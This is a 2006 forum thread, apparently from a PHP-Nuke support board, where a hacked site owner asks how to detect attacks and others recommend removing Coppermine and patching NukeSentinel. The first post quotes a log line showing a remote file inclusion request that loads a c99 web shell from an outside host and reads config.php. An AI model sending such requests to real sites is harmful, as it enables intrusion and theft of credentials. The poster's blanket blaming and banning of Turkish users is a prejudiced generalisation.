| Author |
Message |
Jenses
New Member
Joined: Feb 15, 2006
Posts: 6
|
 Posted:
Thu Feb 16, 2006 1:59 pm |
|
Got hacked by this kind of method (from my sites log)Code:85.97.105.136 - - [16/Feb/2006:01:21:35 +0100] "GET /modules/coppermine/themes/maze/theme.php?THEME_DIR=http%3A%2F%2Fwww.funmekani.com%2Fq%2Fc99shell.txt%3F&act=f&f=config.php&d=%2Fxxxx%2Fxxxx%2Fxxxx%2Fxxxxx%2Fdomain.dk& HTTP/1.1" 200 6224
|
(xxx are replacements from my actual path)
I do now that the theme.php was obsolete and apparently included some bug - this file is removed, but how can I know if there are other files like this one that will open a back door to my system.
My domain is danish so right now many turkish hackers find it to be there right to hack me (muhammed cartoons).
I can ban all turkish IP's - but then they just let theire relatives in Europe do it.
Isnt there a way to catch this kind of hack-attempts?? |
| |
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
|
| Posted:
Thu Feb 16, 2006 2:01 pm |
|
Get rid of Coppermine if you use nuke. We can't reiterate this enough. Just search the forums for information. |
| |
|
|
|
|
jaded
Theme Guru
Joined: Nov 01, 2003
Posts: 1006
|
| Posted:
Thu Feb 16, 2006 2:26 pm |
|
Yes, More then likely, as Raven pointed out, it is coppermine. Be sure that if you do remove it, you remove ALL of it. This has been discussed many, many times. Thanks and Good Luck! |
_________________
Themes BB Skins
[ Only registered users can see links on this board! Get registered or login! ]
Graphic Tees
[ Only registered users can see links on this board! Get registered or login! ]
Paranormal Tees
[ Only registered users can see links on this board! Get registered or login! ]
Ghost Stories & More
[ Only registered users can see links on this board! Get registered or login! ] |
|
|
|
Raven
|
| Posted:
Thu Feb 16, 2006 4:50 pm |
|
Jenses, Are you at patch level 2,3, or 4 of NukeSentinel v2.4.2? The reason I ask is that I have code in there that would have stopped that. |
| |
|
|
|
|
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
|
| Posted:
Thu Feb 16, 2006 5:20 pm |
|
|
|
|
|
Raven
|
| Posted:
Thu Feb 16, 2006 5:49 pm |
|
xss in includes/nukesentinel.php, pl2 I believe handles the hex and there's other code to trap [ Only registered users can see links on this board! Get registered or login! ] in the url request. |
| |
|
|
|
|
evaders99
|
| Posted:
Thu Feb 16, 2006 10:24 pm |
|
Alright, just curious if there is a way to detect such things directly. We could block all these robots trying various exploits for awstats, other Nuke forks, etc. I'm currently using DisError, so when it gets a 404, it passes through a page where I can filter on they were trying to do. |
| |
|
|
|
|
Jenses
|
| Posted:
Fri Feb 17, 2006 3:10 am |
|
Hi Raven
Im on the newest 2.4.2pl4 - have added the pc-killer
I find it a little 'cheap' to say 'get rid of' - we should be able to detect vunerabilities so code can be changed to stop exploites - I wonder if anyone made a tool to test modules systematicly for all known exploites ?? |
| |
|
|
|
|
Raven
|
| Posted:
Fri Feb 17, 2006 3:50 am |
|
I actually have one started but I put it on the back burner. So, from me, at least, the answer is no. |
| |
|
|
|
|
Jenses
|
| Posted:
Fri Feb 17, 2006 7:22 am |
|
Hope to see that one soon - in the meantime I add the normal "if (!defined('MODULE_FILE')) {..." to my 3 party modules
- - and ban all turkish IP's from my sites |
| |
|
|
|
|
jaded
|
| Posted:
Fri Feb 17, 2006 7:52 am |
|
That will not be enough to secure coppermine. Most of us strongly suggest that you remove it entirely. Best of luck to you |
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
